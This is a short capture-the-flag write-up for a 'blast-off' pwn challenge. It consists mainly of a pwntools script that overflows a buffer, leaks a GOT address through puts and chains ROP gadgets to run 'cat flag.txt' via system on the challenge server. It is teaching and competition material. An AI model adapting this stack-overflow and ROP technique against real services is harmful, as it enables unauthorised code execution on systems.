I assumed that `BLAST_OFF` runs `system` at some point, because the string `cat flag.txt` appears in the binary data leaked a few bytes after the `BLAST_OFF` function.
```py
from pwn import *
# Solve script for the "blast-off" challenge: two return-address overwrites,
# the first to leak an address, the second to reach the flag-printing call.
# NOTE(review): every 0x40xxxx / 0x60xxxx value below is hard-coded, so the
# script only holds while the target binary is loaded at a fixed base and the
# overflowed frame has no canary -- presumably a non-PIE, canary-less build;
# confirm against the challenge binary.
HOST = "spaceheroes-blast-off.chals.io"
p = remote(HOST, 443, ssl=True, sni=HOST)

# The chain entries are placed directly after 40 filler bytes.
padding = b"A" * 40

PUTS_PLT = 0x400690
BLAST_OFF_GOT = 0x602038
MAIN = 0x400991

# From trial and error (BROP_GADGET + p64(0) + p64(0) + ... + MAIN) found 6 pops -> assume this common gadget
BROP_GADGET = 0x400b4a  # pop rbx, pop rbp, pop r12, pop r13, pop r14, pop r15
# Helper offsets, more at: https://github.com/nushosilayer8/pwn/blob/master/brop/README.md
# Entering the six-pop sequence part-way through yields the shorter gadgets
# the names describe (RSI_R15 is defined but not used below).
RSI_R15 = BROP_GADGET + 0x7
RDI = BROP_GADGET + 0x9


def _line_after_prompt():
    """Consume output through "to start:" and the rest of that line, then return the next line."""
    p.recvuntil(b"to start:")
    p.recvline()
    return p.recvline()


# Stage 1: call puts on the BLAST_OFF GOT slot, then return to main so the
# vulnerable read happens a second time.
stage1_chain = (RDI, BLAST_OFF_GOT, PUTS_PLT, MAIN)
payload = padding + b"".join(p64(entry) for entry in stage1_chain)
p.sendline(payload)

# The printed line is treated as a little-endian pointer, padded to 8 bytes.
raw_leak = _line_after_prompt()
leak = u64(raw_leak.strip().ljust(8, b"\x00"))
info(f"Leak: {hex(leak)}")

# Both offsets are relative to the leaked address and were read off the
# author's earlier leaks; WIN is the author's guess.
catflag = leak + 443  # /bin/cat flag.txt from leaked data
WIN = leak + 0xdb  # system call from leaked code - guessed this one

# Use this a few times to leak BLAST_OFF code and data
# payload2 = padding + p64(RDI) + p64(leak + OFFSET) + p64(PUTS_PLT)

# Stage 2: first argument = address of the command string, then jump to WIN.
stage2_chain = (RDI, catflag, WIN, MAIN)
payload2 = padding + b"".join(p64(entry) for entry in stage2_chain)
p.sendline(payload2)

flag = _line_after_prompt()
info(f"Flag: {flag}")
```